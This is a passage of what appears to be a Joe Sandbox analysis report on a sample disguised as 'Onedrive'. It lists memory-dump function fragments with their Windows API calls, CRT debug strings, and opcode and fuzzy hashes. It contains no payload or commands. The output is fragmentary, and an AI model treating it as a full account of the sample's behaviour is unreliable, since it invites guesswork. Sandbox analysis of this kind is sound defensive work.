                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess
                                        • String ID:
                                        • API String ID: 3859560861-0
                                        • Opcode ID: 15737396d7e36de835ef5cf2251aab48bcf9544a645884e82e969f2fc5883780
                                        • Instruction ID: 283a3e4cc3c0c1aea858981fd03f400229e19abc7c1b9dee24a458c633d9f7be
                                        • Opcode Fuzzy Hash: 15737396d7e36de835ef5cf2251aab48bcf9544a645884e82e969f2fc5883780
                                        • Instruction Fuzzy Hash: 1F415C32A08E82E6EF149B25A1441BDBBA4FF8EF98B49D135DA4E87319DF3CD1558700
                                        APIs
                                          • Part of subcall function 00007FF6104F93FC: GetProcessHeap.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9425
                                          • Part of subcall function 00007FF6104F93FC: HeapFree.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9439
                                          • Part of subcall function 00007FF6104F93FC: GetProcessHeap.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9460
                                          • Part of subcall function 00007FF6104F93FC: HeapFree.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9474
                                        • GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8CFF
                                        • HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8D14
                                        • GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8D35
                                        • HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8D4A
                                        • GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8D6B
                                        • HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8D80
                                        • GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8DA1
                                        • HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8DB6
                                        • GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8DD7
                                        • HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8DEC
                                        • GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8E0D
                                        • HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8E22
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess
                                        • String ID:
                                        • API String ID: 3859560861-0
                                        • Opcode ID: bf1518c68518747d8e75550e0073bb1ebe2d32fc955a20064eca9f5bcd791406
                                        • Instruction ID: eeaa1e97303343a98890ac5f246a8a8817e3c024b9eae2edf8f52c68df7d81ba
                                        • Opcode Fuzzy Hash: bf1518c68518747d8e75550e0073bb1ebe2d32fc955a20064eca9f5bcd791406
                                        • Instruction Fuzzy Hash: 29410A22A08E42E7EF189B2591583BCBBA0FF5DF59F49C539D60A86355CF38D1248340
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: PointerValidswprintf
                                        • String ID: #File Error#(%d) : $%hs(%d) : $Dumping objects ->$client block at 0x%p, subtype %x, %Iu bytes long.$crt block at 0x%p, subtype %x, %Iu bytes long.$normal block at 0x%p, %Iu bytes long.${%ld}
                                        • API String ID: 2867872725-2254558347
                                        • Opcode ID: e0d5ac88001468575471fabc83286a0951fb7053397fe8767a2cadde61e4fbc8
                                        • Instruction ID: 3bb292b63a57b6dec3f44b33632eb23f39590ea631b4f693ed48ed4f0158c292
                                        • Opcode Fuzzy Hash: e0d5ac88001468575471fabc83286a0951fb7053397fe8767a2cadde61e4fbc8
                                        • Instruction Fuzzy Hash: 0CC12F3661DF8696EB60CB25E48176A73A0FB89792F104536EB8D87B69DF3DD440CB00
                                        APIs
                                        • __vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A031CA2E
                                          • Part of subcall function 00007FF8A0326620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF8A0318375,?,?,?,?,00007FF8A0318062), ref: 00007FF8A0326641
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: CriticalEnterSection__vcrt_lock
                                        • String ID: %ls$Bad memory block found at 0x%p.$Bad memory block found at 0x%p.Memory allocated at %hs(%d).$_CrtMemCheckpoint$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$state != nullptr
                                        • API String ID: 1786109592-3601319530
                                        • Opcode ID: 722345fc339e5307dad66cf511f6cbea81baa1efcc648aa63954b5faa99f4bf1
                                        • Instruction ID: 1ee8e91ad1048b1388d2d00337bacee9a13036b423c0d9197a5551a89641138d
                                        • Opcode Fuzzy Hash: 722345fc339e5307dad66cf511f6cbea81baa1efcc648aa63954b5faa99f4bf1
                                        • Instruction Fuzzy Hash: FF714036A2DF4696EB10CB19E48173AB3A0FB88795F204535EA8D87B94CF7DD455CB00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$Free$Process$InformationLocalWindowsmemset
                                        • String ID: Security-SPP-Action-StateData
                                        • API String ID: 2630303489-3551652513
                                        • Opcode ID: 7699336b6b7f282b642f77ab4554ed0c2efedfc1209a31443493f7247048ebea
                                        • Instruction ID: 1b9da88f938cac59189f76d94afc0440a5841bd56b3166c5507f3ba436cce235
                                        • Opcode Fuzzy Hash: 7699336b6b7f282b642f77ab4554ed0c2efedfc1209a31443493f7247048ebea
                                        • Instruction Fuzzy Hash: 1F51E332E08E46E6EF109B6995803BD63A4FF89BA4F458131DA0EC7389DF3CE5158780
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Free$Alloc_vsnwprintf
                                        • String ID:
                                        • API String ID: 869350258-0
                                        • Opcode ID: a95e66a2d486a7de2bc33df1643f9172f06d30cbe7a2b837ad745425032e1045
                                        • Instruction ID: da425948d6ad7f9796ce820294dc5d755b7deb26eea4c97bf915ee1ebea02e25
                                        • Opcode Fuzzy Hash: a95e66a2d486a7de2bc33df1643f9172f06d30cbe7a2b837ad745425032e1045
                                        • Instruction Fuzzy Hash: E2710422A08E53E7FE246B6964841BD7699AF89FA4F058034DE0ED7395EE3CF4218340
                                        Strings
                                        • %hs located at 0x%p is %Iu bytes long., xrefs: 00007FF8A031A844
                                        • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FF8A031A578
                                        • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 00007FF8A031A7D2
                                        • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FF8A031A426
                                        • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 00007FF8A031A48E
                                        • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed., xrefs: 00007FF8A031A705
                                        • DAMAGED, xrefs: 00007FF8A031A365
                                        • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 00007FF8A031A6CE
                                        • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 00007FF8A031A5E0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %hs located at 0x%p is %Iu bytes long.$%hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$DAMAGED$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).
                                        • API String ID: 0-1381456093
                                        • Opcode ID: 407bbe65323f13c1446eca2a6ba213da027fc83528b946b518c18121b60aee1a
                                        • Instruction ID: ee490d0978a755683b5dc33bccaaf6aa518795b62a5744d596e33219284df9f8
                                        • Opcode Fuzzy Hash: 407bbe65323f13c1446eca2a6ba213da027fc83528b946b518c18121b60aee1a
                                        • Instruction Fuzzy Hash: 0DE1F936A09F8696DB74CB29E48179AB7A0F78C791F100536EB9D87B68DF7CD4508B00
                                        APIs
                                        • GetProcessHeap.KERNEL32(?,?,80070057,00007FF6104FD826,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FE0D0
                                        • HeapAlloc.KERNEL32(?,80070057,00007FF6104FD826,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FE0E4
                                        • memmove.MSVCRT(?,80070057,00007FF6104FD826,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FE112
                                        • GetProcessHeap.KERNEL32(?,?,80070057,00007FF6104FD826,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FE13B
                                        • HeapFree.KERNEL32(?,80070057,00007FF6104FD826,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FE150
                                        • GetProcessHeap.KERNEL32(?,?,80070057,00007FF6104FD826,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FE186
                                        • HeapFree.KERNEL32(?,80070057,00007FF6104FD826,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FE19A
                                        • GetProcessHeap.KERNEL32(?,?,80070057,00007FF6104FD826,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FE1C7
                                        • HeapFree.KERNEL32(?,80070057,00007FF6104FD826,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FE1DB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Free$Allocmemmove
                                        • String ID:
                                        • API String ID: 3442027419-0
                                        • Opcode ID: 88bed13c918e7fb80d26cd8213454f113ac0d062ba6505f9c94ab16fab29db0b
                                        • Instruction ID: d19945aa1e6bc9c561a62d598cff875d2829cca803e7fa132a2345752d79e1b8
                                        • Opcode Fuzzy Hash: 88bed13c918e7fb80d26cd8213454f113ac0d062ba6505f9c94ab16fab29db0b
                                        • Instruction Fuzzy Hash: 0F417F31A08E82D6EE249F5BA54017ABAA5FF89FE5B098038DE0E87755DF3CE4118301
                                        APIs
                                          • Part of subcall function 00007FF6104F9CD8: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6104F704B), ref: 00007FF6104FA00D
                                          • Part of subcall function 00007FF6104F9CD8: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6104F704B), ref: 00007FF6104FA022
                                          • Part of subcall function 00007FF6104F9CD8: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6104F704B), ref: 00007FF6104FA036
                                        • SysFreeString.OLEAUT32 ref: 00007FF6104F714D
                                        • GetProcessHeap.KERNEL32 ref: 00007FF6104F715E
                                        • HeapFree.KERNEL32 ref: 00007FF6104F7173
                                        • PostThreadMessageW.USER32 ref: 00007FF6104F7194
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: FreeHeap$Process$LocalMessagePostStringThread
                                        • String ID:
                                        • API String ID: 4078191539-0
                                        • Opcode ID: 2c7ef42b2d75275cada80261cee81969b4e4b5e5a8e0757516f127fcc49ae481
                                        • Instruction ID: 0c0ca5a73bd7b18db102d099f3306d69441367001d226fc8b32b679c95546b2f
                                        • Opcode Fuzzy Hash: 2c7ef42b2d75275cada80261cee81969b4e4b5e5a8e0757516f127fcc49ae481
                                        • Instruction Fuzzy Hash: 3441E021A0CE82EAFE109B29A5901BDB7A9FF89FA4F158135DA0EC7745DE3DE4548300
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                        • String ID:
                                        • API String ID: 3140674995-0
                                        • Opcode ID: 71c0df9b308b973dc3944309ceeef931511b359d5768c892c0b51a9535b78438
                                        • Instruction ID: 603bc0b97c7c55cd7401fb33c01dbc2bf183727e3008593c3b9cd4c793c53928
                                        • Opcode Fuzzy Hash: 71c0df9b308b973dc3944309ceeef931511b359d5768c892c0b51a9535b78438
                                        • Instruction Fuzzy Hash: 4341283660EF8296E7608B54F4443AAB7A5F789781F508136DACD47BA8EF3DC554CB00
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess
                                        • String ID:
                                        • API String ID: 3859560861-0
                                        • Opcode ID: 08ebd22da5110395b74469f9ffbac05240c56cf53d5b8b387743d881b31d9734
                                        • Instruction ID: 621a01d7189d575e05372acec06f1545b28f059e216ef40b894e51a24d050e71
                                        • Opcode Fuzzy Hash: 08ebd22da5110395b74469f9ffbac05240c56cf53d5b8b387743d881b31d9734
                                        • Instruction Fuzzy Hash: 7B71B221F08E52DAEF04AF6994841BC36A9BF48FA4F454539EE5ED3798DF38E9158300
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                        • String ID:
                                        • API String ID: 4104442557-0
                                        • Opcode ID: f3adc634d01244b8c552e817e92152aec10bd9510da74559573b3576420bdd9d
                                        • Instruction ID: 4dc989d276982d9ae083a8cfcbbc86cd2ee0f53c1dea6b9ff5302a7b16aa1861
                                        • Opcode Fuzzy Hash: f3adc634d01244b8c552e817e92152aec10bd9510da74559573b3576420bdd9d
                                        • Instruction Fuzzy Hash: 74111F36608F429AEF10DF61E8552A833A4FB58B6CF400A35EA6DC7B58EF7CD5648344
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: HeapValidate__vcrt_lock
                                        • String ID: Cycle in block list detected while processing block located at 0x%p.$Heap validation failed.$I'
                                        • API String ID: 504802999-730636035
                                        • Opcode ID: 13bc1b741afaa4ad0493144f1cd0678841a7d677c01badd364706483a96d8a92
                                        • Instruction ID: 1dd3f83e471fc15c00b6ac7e459e84a395dc58f19a9c85a1932b37e0a01dabee
                                        • Opcode Fuzzy Hash: 13bc1b741afaa4ad0493144f1cd0678841a7d677c01badd364706483a96d8a92
                                        • Instruction Fuzzy Hash: 5931533662EF8696EB608B29E08072A77A0F7897D1F104435E78D47BA4DF7DD480CB00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$CaptureContextCurrentDebuggerPresent__crt
                                        • String ID: [!] 0x%0.8X Failed With Error: 0x%0.8X
                                        • API String ID: 3997116924-2773923016
                                        • Opcode ID: a971831d03344af9b790a42068994a9addd36eae4fb5173965852dd0a37b4df6
                                        • Instruction ID: 1cc68df2f83f1ad46caa16963ebf2ac56efcba91fa5ca99be2408712887c4c5e
                                        • Opcode Fuzzy Hash: a971831d03344af9b790a42068994a9addd36eae4fb5173965852dd0a37b4df6
                                        • Instruction Fuzzy Hash: 8C31B73650AFC29AE770DB14E8443ABB7A0FB89395F505636D68D52BA8EF3CD5448F00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000003.2239529457.0000021BD8F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021BD8F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_3_21bd8f80000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $ $#$8$8$d
                                        • API String ID: 0-424029278
                                        • Opcode ID: 3561dfd99937bd88ee09da80c548b2101c97d58637f8026c2b2309ad77361765
                                        • Instruction ID: d7bb335b9f0b8bffa6d40c5149898dea88ff21db59ad0da650687c1eb924bf0f
                                        • Opcode Fuzzy Hash: 3561dfd99937bd88ee09da80c548b2101c97d58637f8026c2b2309ad77361765
                                        • Instruction Fuzzy Hash: 5872C130518B488FEBA9EF08D459BEEB7E1FB98705F544ABDC18DC7291DB3494418B82
                                        APIs
                                          • Part of subcall function 00007FF6104F4A80: VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,000007EE,00007FF6104F4B32), ref: 00007FF6104F4AAB
                                          • Part of subcall function 00007FF6104F4A80: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,000007EE,00007FF6104F4B32), ref: 00007FF6104F4ABC
                                        • FindResourceExW.KERNEL32 ref: 00007FF6104F4B56
                                        • GetLastError.KERNEL32 ref: 00007FF6104F4B67
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FindQueryResourceVirtual
                                        • String ID:
                                        • API String ID: 571639142-0
                                        • Opcode ID: a8bfd02c44b34e6d65e2e36b16032487fb88923247a44d14980593de26e02d56
                                        • Instruction ID: 680f90b892a3e7d844f617c32184fc3a0aa273299f61018b33134a9888dc399e
                                        • Opcode Fuzzy Hash: a8bfd02c44b34e6d65e2e36b16032487fb88923247a44d14980593de26e02d56
                                        • Instruction Fuzzy Hash: 17216121F08E92D2EF105B69A49027D66E4EFC9FA4B548534DA0EC7796EE2DF8208704
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,00007FF8A030329D,?,?,?,?,?,?,00007FF8A031EFA0), ref: 00007FF8A030319B
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,00007FF8A030329D,?,?,?,?,?,?,00007FF8A031EFA0), ref: 00007FF8A03031A6
                                        • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF8A030329D,?,?,?,?,?,?,00007FF8A031EFA0), ref: 00007FF8A03031AC
                                        • TerminateProcess.KERNEL32(?,?,?,?,00007FF8A030329D,?,?,?,?,?,?,00007FF8A031EFA0), ref: 00007FF8A03031BA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                        • String ID:
                                        • API String ID: 3231755760-0
